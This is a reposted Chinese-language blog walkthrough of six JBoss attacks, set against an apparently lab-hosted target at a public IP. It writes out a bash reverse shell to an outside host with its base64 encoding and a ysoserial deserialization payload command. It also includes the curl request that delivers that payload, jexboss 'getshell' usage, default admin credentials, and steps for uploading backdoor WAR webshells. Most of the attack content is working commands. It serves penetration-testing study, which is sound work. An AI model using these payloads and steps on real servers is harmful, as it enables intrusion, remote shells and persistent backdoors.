目录

常见中间件漏洞攻略-Jboss篇

一、CVE-2015-7501-Jboss JMXInvokerServlet 反序列化漏洞

第一步:开启靶场
第二步:访问该接口,发现直接下载,说明接⼝开放,此接⼝存在反序列化漏洞
复制代码
http://47.103.81.25:8080/invoker/JMXInvokerServlet
第三步:准备ysoserial⼯具进⾏漏洞利⽤,将反弹shell进⾏base64编码
复制代码
#反弹shell
bash -i >& /dev/tcp/47.103.81.25/8888 0>&1

#64base编码
YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDMuODEuMjUvODg4OCAwPiYx

#命令使用工具生成恶意文件
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDMuODEuMjUvODg4OCAwPiYx}|{base64,-d}|{bash,-i} ">exp.ser
第四步:服务器开启监听,终端执行命令,成功反弹shell
复制代码
#执行命令
curl http://47.103.81.25:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

二、CVE-2017-7504-JBossMQ JMS 反序列化漏洞

第一步:开启靶场
第二步:访问漏洞靶场
复制代码
#漏洞靶场
http://47.103.81.25:8080/jbossmq-httpil/HTTPServerILServlet
第三步:准备jexboss工具包,geshell
复制代码
#运行工具,getshell
python3 jexboss.py -u http://47.103.81.25:8080

三、CVE-2017-12149-JBoss 5.x/6.x反序列化漏洞

第一步:开启靶场
第二步:验证是否存在漏洞
复制代码
#漏洞存在地址
http://47.103.81.25:8080/invoker/readonly

#响应码500 --- 服务器内部错误,无法完成请求 --- 说明⻚⾯存在,此⻚⾯存在反序列化漏洞
#服务器将⽤户post请求内容进⾏反序列化
第三步:使⽤⼯具进⾏检测 DeserializeExploit 如果成功直接上传webshell

四、Administration Console弱⼝令

第一步:登陆后台
复制代码
#后台地址
http://47.103.81.25:8080/admin-console/login.seam

#用户名密码
admin:vulhub
第二步:点击web应用,上传后门文件shell.war
第三步:连接webshell
复制代码
#shell.jsp地址
http://47.103.81.25:8080/shell/shell.jsp

五、低版本JMX Console未授权

第一步:开启靶场
复制代码
#URL
http://47.103.81.25:8080/jmx-console/

#用户名密码
admin:amdin
第二步:准备通过URL的⽅式远程部署war包
第三步:将后门文件war包上传至云服务器,并测试能否顺利访问到
第四步:填写war包地址,点击invoke跳转
第五步:连接webshell
复制代码
#URL
http://47.103.81.25:8080/shell/shell.jsp	w

六、高版本JMX Console未授权

第一步:开启靶场
复制代码
#URL
http://47.103.81.25:8080/jmx-console/
第二步:准备通过URL的⽅式远程部署war包cmd.war
第三步:连接webshell
复制代码
#URL
http://47.103.81.25:8080/cmd/shell.jsp

FROM IYU_

本文是转载文章,点击查看原文
如有侵权,请联系 xyy@jishuzhan.net 删除
相关推荐
神经毒素8 分钟前
WEB安全--SQL注入--利用log写入webshell
sql·安全·web安全
老马啸西风28 分钟前
MOSN(Modular Open Smart Network)-00-聊一聊 MOSN
云原生·中间件·开源·serverless·go·service_mesh
秋说38 分钟前
【区块链安全 | 第六篇】NFT概念详解
安全·区块链
Suckerbin2 小时前
DerpNStink: 1靶场渗透
学习·安全·网络安全
BenSmith2 小时前
V8 Number类压缩
安全
智想天开2 小时前
5. 实现一个中间件
中间件·php
栩栩云生2 小时前
[250327] Next.js 修复安全漏洞 CVE-2025-29927 | Apache Flink 2.0.0 正式发布
安全·apache·next.js
QING6182 小时前
Android Biometric API 新手使用指南
android·安全·app
科技云报道2 小时前
瑞数信息《BOTS自动化威胁报告》正式发布
网络安全